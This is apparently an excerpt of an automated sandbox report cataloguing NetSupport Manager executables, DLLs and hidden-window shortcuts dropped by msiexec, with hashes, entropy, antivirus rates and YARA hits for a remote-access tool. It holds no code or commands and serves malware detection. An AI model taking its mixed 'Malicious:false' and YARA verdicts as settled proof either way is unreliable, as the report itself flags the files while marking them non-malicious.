                                                                                      SSDEEP:1536:/oKKGZiiHapQXaPjALcunPsWjcdRCunjVpnAK9LXee/VujHNee/RjH0:wKKQ/KP8+RCuntxe2ujtesjU
                                                                                      MD5:27C16711A2025C061EA30E09F1BF6609
                                                                                      SHA1:308BF98A3E597B83D066B8F149E47C12FC487642
                                                                                      SHA-256:9159A0FFA498F379570478EC09479764FB8B7130E73B3C02F2FE7BD709B9B20C
                                                                                      SHA-512:9152A43977F82EAC69BD953F9B8D2FEB64C7102386736C8847A32A40D9DF82DCB6DBEA3FDE3D44835C6D03628124308CC240A9EB8456CBC44E6760F40A265D10
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSToast.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):32224
                                                                                      Entropy (8bit):7.0841664339711
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:o52mnrr2pe/GJvHDHf/ckIYBpr2pe/G+HDHf/ckC:gPnfee/wjHx1ee/7jHW
                                                                                      MD5:907C8647640B41EB840DD3F8D5C0267E
                                                                                      SHA1:87D374852CEEB5AB41E6D39FD3B407E51B2BE6F7
                                                                                      SHA-256:4EE7811DFDF1ED46BD2D224B81B3FB0F5371FD5A4DB18358F052DA73316D9A99
                                                                                      SHA-512:B7F6CA82C5547CBA9259934DF8AE08BA706E4FB3E8DB10E1EEB44EDF00336C60BC7CD732BE113E11A321A657D30FC9F1B396A28B2342FD96682EA68147D303D6
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICHEK.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):9087968
                                                                                      Entropy (8bit):5.4923586433480756
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:aZcDBXpzw67GUIZr7h4721VgP6la/o7TdT7ZbMa3kTaSh95Qn1RURG:KWIM7q2SAyqTaShAnAI
                                                                                      MD5:4BFB9DB4940644EAD940B6C3DB7B6C12
                                                                                      SHA1:48DC699DD2ABDD6562BB14B332C031439717A666
                                                                                      SHA-256:ACA860C6121287876582D3FACA1D120B0B92DA220A537220AC4A352828DAEFB3
                                                                                      SHA-512:B9B57B719EFD5E8F47837FA18B4D4C8E952D962281A09F16B4CE494AB38B851DAC305402C1873FCE41B602B79FE17473EF785D5635B3E5967DBD3D7480CA1357
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICL32.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):164832
                                                                                      Entropy (8bit):6.897162199883277
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:AMAlhDScGgKqqrccIPaldpZOWCFheHzS7whb1cVeEj5eijd:cfDiWqO9o9Keeei
                                                                                      MD5:9324FCA454B0112B4DD12450FD3DAD1C
                                                                                      SHA1:8AE28F336B602FCB3ED8E83272DD27D622C50A65
                                                                                      SHA-256:3C1FA4D5AFC3996517990D3C36CBBD5BE1939007123F5CA288B3B64CEBC1FC7D
                                                                                      SHA-512:03DA719A40D656130B2D849A3AE689B035C2CA75EB8BADC4EDAF27CC7548DDDB3E923D530ECA28E0B8E94A8984B4F977829339573490489BA670DEC36D11F966
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIHOOKS.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):632288
                                                                                      Entropy (8bit):6.835333969996357
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:mKM5hHCLsEy4GJNo7Tff0eKsrdKvaj3IzWGLqD9AFPOy0EuEIBy14sYMwWiy8BaR:mKwhHCLsEy+EeKsUvUvGLkqD0ab47MVF
                                                                                      MD5:FEE6C10F16BB7A3DC448BF8111386867
                                                                                      SHA1:50864E624F0DB04B22C9D418D55AE2413FBEDF42
                                                                                      SHA-256:488772E8649C350CD950DCF847786293034371208C297E1E151CF17BF384DD2F
                                                                                      SHA-512:557E0FF6CA34353A30B0F77585905648FA0C1C0824367B0EBDDFC9DA5B57CA7952AA23AEED961EF0163A4A87CE8C267C47050614A74BBB66148E82F8094335D4
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIIMAGE.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):56288
                                                                                      Entropy (8bit):5.934323135362062
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:j8OV1u6Jr2pe/6QHDHf/ckSCr2pe/DryHDHf/ckI:jRee/RjHpee/KjH0
                                                                                      MD5:5758E67FBD1984B6E43648C8568FB4EE
                                                                                      SHA1:6C1CD32D27EA2719668FE1ADEBDD8AF626814007
                                                                                      SHA-256:2723D3EC822F369E1C083085335C86D9FD94367DDF36BB2047BBCE0DAE59AA7D
                                                                                      SHA-512:C3743E4499509E384E00C14C0C5467A0C2F337201C868A1426010F5A086F3B5C74A4E97D006042835902E0332D2833FCCD30ECFA9DD8D17F3AB109976B5AC6B1
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2976736
                                                                                      Entropy (8bit):7.559871297074836
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:tl4QLOK6L9jK36nyJrqfz2BJ24PomOTLuXUddgoo4J2:tl4W6L9jO6oGKBJqLuXUAojJ2
                                                                                      MD5:62629F14DF2B43A013EA9FE115CBB008
                                                                                      SHA1:35F7220685F4A32AA43A43A382C9D4523F6C5D0C
                                                                                      SHA-256:D617C40A780E21CDBE062C305370655437F5CBF5FF4F84D09E4FCC3F81133561
                                                                                      SHA-512:B95360929507CCF02B90362AD42042546F4B992831F551EA17DCEBF8BC7C5FC7F0604013C5781A3B5442AEA3B56B4B105BF3651EA0A0B0568F4BBD1677398D6F
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIRES.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):44576
                                                                                      Entropy (8bit):5.569926928492802
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:kFPPr2pe/b2ZHDHf/ckwlp6r2pe/ijHDHf/ckm:khDee/YjHUCee/ejHS
                                                                                      MD5:2FF563D9CF8AFABBADF04009667B0FFF
                                                                                      SHA1:335EE10CC1A6B52219EFDC6B765A4820594BF928
                                                                                      SHA-256:D9F1FD8CAEE025BBC4193B9F2637E8577D51DE3129C5E9541B6CBDC02B4F98E6
                                                                                      SHA-512:26948D04ED4920FF9A77CCB8A2333038F7EEF0F59E8889A2B6DAE34350537A22C0D687F7F2EA2DB5B1AF8DCDB120EBBB683801FF8C026BC42DC167B22001E964
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIVDD.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2891744
                                                                                      Entropy (8bit):6.679546690054984
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:dbpvdeyqfF2Mbwnij1QdEdJh2skJxwj934JFCb4l5uUPyWWuDQIlF7zePcFtFc6R:d98fdbwniqdEfh2skJxwj934FCb88UP3
                                                                                      MD5:F7642B7DE834924F1470830D214D9D53
                                                                                      SHA1:C816AA12D0E64D6B89AF134D4EE8339FB547E502
                                                                                      SHA-256:D4083381EA6F1364137F5F7DEF093CEF5554718F37299B0A8832BE622F0F74C6
                                                                                      SHA-512:5E128EBD6392A84715E18C405E8502E0B5DAC2DDE64F88919911F854F2C60A8AE1FC24FFF3429270960564882D18471104E66DF68267D1C5F7374732F44B8BD2
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIhtmlgen.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2934240
                                                                                      Entropy (8bit):6.695777901099138
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:lp3sVlUmDVC4SxoOQnIfZVuLDo1f80nW2rzVtn11wZRNMobc2QSBa4sHsYbf5f5e:iUmDvbO1fZVeDo1f80nW2rzVmZnMClQu
                                                                                      MD5:0830B115A3595DBB15A5C153AA17DB44
                                                                                      SHA1:1B3D19542C25E74E95024F2EBA1F5C3373316AB2
                                                                                      SHA-256:FCF7B187FF10860C26CBF999C726475C3E12CE27D7CA3D70388AA25B286D4C1E
                                                                                      SHA-512:D22DDFFF15A0654DBD7B49B7255EB8BB01C4D3EA149DC3B586468CCA4447940C249319664CA68BBAC07857D5BBEDBCC02D7AC62B0C432763EEC2AE399AA5225B
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIinv.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):92640
                                                                                      Entropy (8bit):6.734732819126988
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:cqDAGQoJ0iJ0FG6C2uIHI5oskMfzNUbImR4NB+iOfGdVUdTee/njHlee/RjHV:BPQoLJnl2umI5osrzibImR4NBjOfGdVm
                                                                                      MD5:05835B95CA60D3B36412E006AD2FDD0E
                                                                                      SHA1:1D558CBE48BF0C5FB91C62E02A09201A0C6A406A
                                                                                      SHA-256:35B518AE2E1BBE963F9CD996A566C00A6825B52A01A08AF52B642363B33B96BE
                                                                                      SHA-512:AF28C3631627246C022515339D5C3B6A62D0B83C5CB54F918DF3EA88ED6439BF5E8BABC2E92EE105EDF31394E97948D8F87D44F7C9DBFD9EE3984023A14EE383
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\StoreInvDll.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):471008
                                                                                      Entropy (8bit):6.6933780240823175
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:7+MEmCOirSwXCHVs5QroHNgstVJ9lf8Mu3qyPKLK/:7+MEp5IsV4Mu6yPK4
                                                                                      MD5:0F0C9E34BABB2BA2036E9A4CD4F70FEB
                                                                                      SHA1:5EFB10AFCA796CC5699A79AB49FF56AC92BEDE25
                                                                                      SHA-256:BE063E964439510E9303BF0CC03E5CDA3169A5E115609519A608D1BF05705EA5
                                                                                      SHA-512:C4716B2BBFBC92C6D39013911DF923EDF2EAB7C460193EB8C3BC121E5EC58850E54E8E3B4C8B71FCD4FEBC308FABDA65AE2A91BED10006029CD40F6DB504B960
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\TCCTL32.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):206304
                                                                                      Entropy (8bit):6.814671479498648
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:mCAq0fb1suXPEToF+HauQ0wpiEAOseIeN:PiRsu8ToEHnQ0wC8xN
                                                                                      MD5:A314D8185FCEF3D4B3B01542991B8AF4
                                                                                      SHA1:CCE615B170CED2D4C15D073EF0F60D1FA83FC845
                                                                                      SHA-256:04C0240CA1F248472CB080E873B88BF79F60E5894B1118DCC8DAB33A13C505A1
                                                                                      SHA-512:9F6DC292AA94D4579EE9949DA4E68693B2CE21F43D77CF8F9AEA09E7F40CF16F0C131F29DAB9AE78A9D059F076BFF65C95D20A971AEE7E7E651F55376A0132C5
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWVI.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):45536
                                                                                      Entropy (8bit):7.0739520347335105
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:uPReRnverIpOBvrs+onaJQJdTFc/4BdOnDhdHu4quUr2pe/CjSHDHf/ckY4r2pe8:sR6verIpyvrFo6Q9c/EdOnXu410ee/CL
                                                                                      MD5:E36489E8AACE1404DC78794A10E3458A
                                                                                      SHA1:CD49AE49F2DF49915BA838766D803A9CBA5CCB65
                                                                                      SHA-256:C85614EEEE02F6CE19789B9A8259EE1CC020F6F635EC66AABB26500F0F70F653
                                                                                      SHA-512:3B2CAFA80B4B3F2CD83D5DB9B6E4C9E7032605E59671CAB172C11D17268D772A02B5EBB5B14490823497E221E7586D713D61FE0C6312F8FEE7514ACDC71C00DB
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWXP.DLL, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):763872
                                                                                      Entropy (8bit):6.574853256300612
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:UwBfoW/SGOLyn5PmPgLmkgM2uyIXEFH9YI/WIvSGvmm5s3qGGaG6rn5ax77/v10E:F6IqkgM2uyIqH93/WIvOqMR/YfMl2eTS
                                                                                      MD5:0FCF65C63E08E77732224B2D5D959F13
                                                                                      SHA1:5419B79FE14E21D1D5B51FE8187F7B86EC20DE74
                                                                                      SHA-256:F3E587F94A79C46A603B39286E93B17FABC895C6B71B26B0FC5D812CF155B7E5
                                                                                      SHA-512:7C289AAF3AC1B998C8CA9593A58C8AA3A9AA9F41852C1ED4192B908E0AD51871400D585B4FE508D49368BDFC7378807D289971914870A7A47B0410A946E5E381
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\WINSTALL.EXE, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1419232
                                                                                      Entropy (8bit):7.97986719531702
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:M3Nqv+8N7hdPgL8hKnCThLv7AEeRP/HM8Z4Sx5cTI25oWOQt:M82A7/PjACTFAEgb7bmos
                                                                                      MD5:F9CF2DB8B99DC50EAB538C4D860AC1A4
                                                                                      SHA1:B261C9E7F082EB8649AFAB9A677E022F84FD2823
                                                                                      SHA-256:865864A32AEE78E588764F37847522FDB0BD1940ECD73B3C49D8F68B4D5BAD71
                                                                                      SHA-512:59660740B58B1761A4658AEB02F669F1FD8A3FCB07C162A86B9565C5F9219CB993CC9D94B43B1D39EDCD5032B478B8A9B3A388FB82449CA82A83E3C6DD94C02D
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\Installer\MSI1387.tmp
                                                                                      File Type:MS Windows shortcut, Item id list present, Has Relative path, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):1726
                                                                                      Entropy (8bit):2.3294570493090614
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:8gXEwRsXUCV/tz0/CSL08nKw2aZlw2nZluMJ82o2nMvO4NHUR9sL1MJ82o2n3CNq:8CurWLjKwbwGN+LGMvO4uRQq+LGm6y
                                                                                      MD5:94F5BEDD233034445791C9C9CB9509FE
                                                                                      SHA1:FA5F349015106D63296A63CCE846B692B51BAC22
                                                                                      SHA-256:E3E89D7719970663A1EC2D2A4B4F750242FE4263FDF23EDA33AC347E38E6C23D
                                                                                      SHA-512:9CBF78ECAD91745D4794D5BCD62B5EF5808A76E32AF25648FAE896A40CB412A60FD755FB37BE1F42DD2181B9606AEFB2BAA001E19D4D35CBAFF8AB6C1F3E51EB
                                                                                      Malicious:false
                                                                                      Preview:L..................F........................................................W....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....`.1...........NetSupport..F............................................N.e.t.S.u.p.p.o.r.t.....x.2...........NetSupport Manager..V............................................N.e.t.S.u.p.p.o.r.t. .M.a.n.a.g.e.r..."...C.....\.....\.....\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.N.e.t.S.u.p.p.o.r.t.\.N.e.t.S.u.p.p.o.r.t. .M.a.n.a.g.e.r.........%USERPROFILE%\AppData\Roaming\NetSupport\NetSupport Manager........................................................................................................................
                                                                                      Process:C:\Windows\Installer\MSI1387.tmp
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Directory, ctime=Sat Nov 23 00:54:08 2024, mtime=Sat Nov 23 00:54:08 2024, atime=Sat Nov 23 00:54:08 2024, length=0, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):1575
                                                                                      Entropy (8bit):3.022233693470855
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:8E4wwlSK0cwAke90eGvKD/o8R28/b+/B8R2nyjAi2ihNlcb72o2nMfFEhE2o2nxf:8hjkv67zRHDuaRGOAuC7LGMSELGxY8m
                                                                                      MD5:18C6713328C2BCDD17E1E09084AD2DFF
                                                                                      SHA1:508189175A046EECB7EC61D7E9E5B6390DC49DFC
                                                                                      SHA-256:6EF4D58A52814F5B4B0739403B2B54649A16DB90DB47920C904BFF7176206DDA
                                                                                      SHA-512:C80CB343A0747C0348C13B8F0C1C06F5E98AC742B2C0DC777DCD7EF60D5AD2614A86A61116F2E709B3E3247846D64A208951C45A43FB4DE1D33AEAEF29200983
                                                                                      Malicious:false
                                                                                      Preview:L..................F..... ..V..J=..V..J=..V..J=..........................[....P.O. .:i.....+00.../C:\...................`.1.....wY... PROGRA~3..H......O.IwY.......t....................."..P.r.o.g.r.a.m.D.a.t.a.....^.1.....wY... NETSUP~1..F......wY..wY......\......................"..N.e.t.S.u.p.p.o.r.t.....n.1.....wY... NETSUP~1..V......wY..wY......]......................"..N.e.t.S.u.p.p.o.r.t. .M.a.n.a.g.e.r.......[...............-.......Z............;L......C:\ProgramData\NetSupport\NetSupport Manager..2.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.N.e.t.S.u.p.p.o.r.t.\.N.e.t.S.u.p.p.o.r.t. .M.a.n.a.g.e.r.........%ProgramData%\NetSupport\NetSupport Manager.........................................................................................................................................................................................................................%.P.r.o.g.r.a.m.D.a.t.a.%.\.N.e.t.S.u.p.p.o.r.t.\.N.e.t.S.u.p.p.o.r.t. .M.a.n.a.g.e.r.............................
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):19136
                                                                                      Entropy (8bit):6.960788331628294
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:bvmMWVghW/ivSx9YOCAs/nGfe4pBjSf+GEOWNArXVWQ4mWPQ4mqnajxcRGlPMRdk:XW2hWKSUA0GftpBjxDib4mll7PedGSk
                                                                                      MD5:37DA7F6961082DD96A537235DD89B114
                                                                                      SHA1:DAA1E2E683FA0512FF68EB686D80B4AA3B42E5B6
                                                                                      SHA-256:6EE46C6B6727EB77BCBCDD54DC506680CA34AF7BC7CA433B77775DE90358844E
                                                                                      SHA-512:AF4F28E3319344D2E215F56026E9CEE5C951B5C44374C7EEEA6790D18F174D7E785CEACBBF1450D5CA1D76F207B5F7B4F24674468F30BE84C6C3E90C48CE2A2C
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18624
                                                                                      Entropy (8bit):6.97464085764015
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:sZWVghW/Y7l9YOCAs/nGfe4pBjSfXVJ4WNArXVWQ4mWGqnajxcRGlPMRd54kft:4W2hWQ7QA0GftpBjcqRll7PedGkft
                                                                                      MD5:3B3BD0AD4FEA16AB58FCAEAE4629879C
                                                                                      SHA1:EB175F53640FB8AC4028A7657BBF48823A535677
                                                                                      SHA-256:DCB9CF7E31D6772434C683353A1514F10D87D39FEAA9B3EDF3FA983B2988294C
                                                                                      SHA-512:F206E7F56A218A1725F212B20416210C228E60D0D3C44F9A598C93ACB10BF8A3C961B4C4D104AE0F166598BE5C5102A1FF77A39D2B70743E784F69C82FD4C730
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18624
                                                                                      Entropy (8bit):6.982441576564087
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:NvW2hW+77QA0GftpBjuYvd0WrlI663Upe:NR9yi866kQ
                                                                                      MD5:584766DF684B2AD2A3A5B05A5B457FAC
                                                                                      SHA1:C207B7AEDB8D978C8320A1454331519A8365F20D
                                                                                      SHA-256:B15964D49A2C5219E0923137AA9028611BE81FDBDCBB0D43BB3AAA23114E401F
                                                                                      SHA-512:3BC7D49F997E489466858A21DAA22B397ADB8E736D7E064542ED5F73CD87B52CBD412CDEC2B4B892F9231C2562E24C8DEBAB73054E878405F2B2A022E86D26B8
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18624
                                                                                      Entropy (8bit):7.00674396465633
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:+F87mxD3XWVghW/IvSx9YOCAs/nGfe4pBjSf/qoWNArXVWQ4mWBqnaj9RlS6Vab:h70W2hWQSUA0GftpBjoqUOlBRAkO
                                                                                      MD5:906CB0C8ABA8342D552B0F37DDFD475F
                                                                                      SHA1:A3CD528B9C212FEA97495A557A91D638B1608418
                                                                                      SHA-256:582E87ADE6DAC258844154B068C291FF8D8F6D7AB6EE029FCD3CF1391874C74B
                                                                                      SHA-512:27B33658A30010E0C6A09F5B1359A9E39871B7851D0CFB43F5E2063FB77DAFB34DF9724FCE82FC7826463104FEE0820AE4E996A76DD3912490689686EA05844B
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):22208
                                                                                      Entropy (8bit):6.906399541614446
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:3CYPvVX8rFTsdWVghW/VvSx9YOCAs/nGfe4pBjSfZCLWNArXVWQ4mWbmqnaj9Rlg:1PvVXfW2hW9SUA0GftpBj8yBlBRAkad
                                                                                      MD5:779A8B14C22E463EA535CBCA9EA84D49
                                                                                      SHA1:4620531D5291878C10D6E3974F240B98BC7FB4B9
                                                                                      SHA-256:FC0551DE11B310DFD8F3FC924F309D5E754B547FFC475CF6C3D007BB5366F148
                                                                                      SHA-512:08882528DF66FC582A890AD64C7F96E8F9DE56D4871A4D9B6B32E1C3FFB0C29B425F4CC893B2575F6697FFAFBB56BA84D43D602483B0470488DF823D445B84E4
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18624
                                                                                      Entropy (8bit):6.98650705248822
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:7WVghWu7vSx9YOCAs/nGfe4pBjSby+ggmGWNArXVWQ42WHmMqnaj9RlS6VSyS:7W2hWmSUA0GftpBj+1bMlBRAkS3
                                                                                      MD5:F6D1216E974FB76585FD350EBDC30648
                                                                                      SHA1:F8F73AA038E49D9FCF3BD05A30DC2E8CBBE54A7C
                                                                                      SHA-256:348B70E57AE0329AC40AC3D866B8E896B0B8FEF7E8809A09566F33AF55D33271
                                                                                      SHA-512:756EE21BA895179A5B6836B75AEEFB75389B0FE4AE2AAFF9ED84F33075094663117133C810AB2E697EC04EAFFD54FF03EFA3B9344E467A847ACEA9F732935843
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):18624
                                                                                      Entropy (8bit):7.046229749504995
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:WUWVghW/zvSx9YOCAs/nGfe4pBjSfEtcsWNArXVWQ4mWV9QqnajxcRGlPMRd54xS:WUW2hW7SUA0GftpBjBj3ll7PedGxC/
                                                                                      MD5:BFB08FB09E8D68673F2F0213C59E2B97
                                                                                      SHA1:E1E5FF4E7DD1C902AFBE195D3E9FD2A7D4A539F2
                                                                                      SHA-256:6D5881719E9599BF10A4193C8E2DED2A38C10DE0BA8904F48C67F2DA6E84ED3E
                                                                                      SHA-512:E4F33306F3D06EA5C8E539EBDB6926D5F818234F481FF4605A9D5698AE8F2AFDF79F194ACD0E55AC963383B78BB4C9311EE97F3A188E12FBF2EE13B35D409900
